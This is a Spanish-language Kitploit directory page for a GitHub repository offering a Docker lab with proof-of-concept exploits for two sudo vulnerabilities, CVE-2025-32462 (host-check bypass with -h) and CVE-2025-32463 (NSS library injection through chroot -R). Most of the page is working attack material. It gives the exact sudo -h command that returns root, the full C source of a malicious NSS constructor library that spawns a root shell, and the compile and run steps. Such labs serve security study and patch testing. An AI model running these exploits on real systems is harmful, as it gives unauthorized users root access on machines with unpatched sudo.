Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-32462-CVE-2025-32463-PoC-Lab — Laboratorio basado en contenedores con exploits de prueba de concepto para dos vulnerabilidades críticas de sudo: evasión de validación de host (CVE-2025-32462) e inyección de biblioteca NSS mediante chroot (CVE-2025-32463) para escalada de privilegios. | Kitploit
Herramientas/GitHubGitHub/yonathanpy/cve-2025-32462-cve-2025-32463-poc-lab
Escalada de PrivilegiosSeguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónExplotación de BinariosLabs y Práctica

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub
yonathanpy/cve-2025-32462-cve-2025-32463-poc-lab

CVE-2025-32462-CVE-2025-32463-PoC-Lab

Laboratorio basado en contenedores con exploits de prueba de concepto para dos vulnerabilidades críticas de sudo: evasión de validación de host (CVE-2025-32462) e inyección de biblioteca NSS mediante chroot (CVE-2025-32463) para escalada de privilegios.

Ver Repositorio
214hace 6 mesesAún no revisado

CVE-2025-32462 y CVE-2025-32463 – Laboratorio Avanzado de PoC

Este repositorio proporciona un laboratorio basado en contenedores y un PoC detallado para dos vulnerabilidades críticas de sudo:

  • CVE-2025-32462 – Omisión de la lógica de coincidencia de host de sudo -h
  • CVE-2025-32463 – Escape de la biblioteca NSS de sudo -R chroot

Investigación y Créditos

Investigación original por Rich Mirch – Stratascale CRU
Entorno de PoC y laboratorio por MAAYTHM


Resumen Técnico

CVE-2025-32462 – Omisión de la Lógica de Validación de Host

Sudo aplica la autorización basada en host mediante Host_Alias en /etc/sudoers.
La vulnerabilidad ocurre cuando se proporciona la opción -h: sudo evalúa el nombre de host proporcionado en lugar del nombre de host canónico del sistema, permitiendo a los usuarios restringidos omitir las políticas de sudo basadas en host.

Impacto:

  • Omisión de la política basada en host
  • Escalada de privilegios
  • Ejecución no autorizada de comandos como root

CVE-2025-32463 – Inyección NSS a través de Chroot

La opción -R de sudo permite la ejecución en un entorno chroot. Durante la inicialización, las bibliotecas NSS (Name Service Switch) se cargan según /etc/nsswitch.conf. Al proporcionar un entorno chroot malicioso y una biblioteca NSS personalizada, un atacante puede ejecutar código como root.

Superficie de ataque:

  1. Sistema de archivos chroot controlado
  2. nsswitch.conf definido por el atacante
  3. Biblioteca compartida NSS personalizada cargada dinámicamente
  4. El código constructor se ejecuta con privilegios elevados

Impacto:

  • Escalada de privilegios a root
  • Ejecución de código arbitrario dentro del contexto chroot

Entorno de Laboratorio

  • SO base: Ubuntu 24.04
  • Versión vulnerable de sudo: 1.9.16p2
  • Usuarios: pwn (no root)
  • Aislamiento: Contenedor Docker con red personalizada

Estructura del Repositorio

root@kitploit:~
CVE-2025-32462-CVE-2025-32463-PoC-Lab
├── Dockerfile
│   # Builds vulnerable sudo environment
│
├── exploit/
│   ├── cve_2025_32463.c
│   │   # Malicious NSS shared library used for privilege escalation
│   └── build.sh
│       # Compiles the exploit payload into a shared NSS module
│
├── lab/
│   └── setup.sh
│       # Automates vulnerable lab configuration and sudoers setup
│
└── README.md
    # Technical documentation, vulnerability analysis, and PoC usage guide

Análisis técnico completo, recorrido del PoC y guía de explotación


Configuración del Laboratorio Docker

root@kitploit:~
FROM ubuntu:24.04

ENV DEBIAN_FRONTEND=noninteractive

RUN apt-get update && \
    apt-get install -y build-essential wget libpam0g-dev libselinux1-dev zlib1g-dev \
                       pkg-config libssl-dev git nano gcc && \
    rm -rf /var/lib/apt/lists/*

WORKDIR /opt
RUN wget https://www.sudo.ws/dist/sudo-1.9.16p2.tar.gz && \
    tar xzf sudo-1.9.16p2.tar.gz && \
    cd sudo-1.9.16p2 && \
    ./configure --disable-gcrypt --prefix=/usr && \
    make && make install

RUN useradd -m -s /bin/bash pwn && \
    echo 'pwn:pwn' | chpasswd

USER pwn
WORKDIR /home/pwn

CMD ["/bin/bash"]

Construir y Ejecutar el Laboratorio

root@kitploit:~
docker build -t sudo-vuln-lab .
docker network create --subnet=172.190.0.0/16 sudolabnet
docker run -d \
  --network sudolabnet \
  --ip 172.190.0.3 \
  --hostname lowpriv.test.local \
  --add-host highpriv.test.local:172.190.0.2 \
  --name lowpriv \
  sudo-vuln-lab tail -f /dev/null

CVE-2025-32462 – Explotación

root@kitploit:~
docker exec -u root -it lowpriv bash
echo 'Host_Alias HIGH = highpriv.test.local' >> /etc/sudoers
echo 'Host_Alias LOW = lowpriv.test.local' >> /etc/sudoers
echo 'pwn HIGH,!LOW = NOPASSWD:ALL' >> /etc/sudoers

Comportamiento normal:

root@kitploit:~
sudo id
# Password required

Explotación:

root@kitploit:~
sudo -h highpriv.test.local id
# uid=0(root) gid=0(root) groups=0(root)
sudo -h highpriv.test.local hostname -f
# lowpriv.test.local

CVE-2025-32463 – Explotación

root@kitploit:~
mkdir -p exploitDir/etc
echo 'passwd: /cve_2025_32463' > exploitDir/etc/nsswitch.conf
mkdir libnss_
cp /etc/group exploitDir/etc/

Biblioteca NSS maliciosa:

root@kitploit:~
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void GIVEMEROOT(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  execl("/bin/bash", "/bin/bash", NULL);
}

Compilar:

root@kitploit:~
gcc -shared -fPIC -Wl,-init,GIVEMEROOT -o libnss_/cve_2025_32463.so.2 cve_2025_32463.c

Ejecutar:

root@kitploit:~
sudo -R exploitDir <command>
# Root shell obtained
id
# uid=0(root) gid=0(root)
Descargar herramienta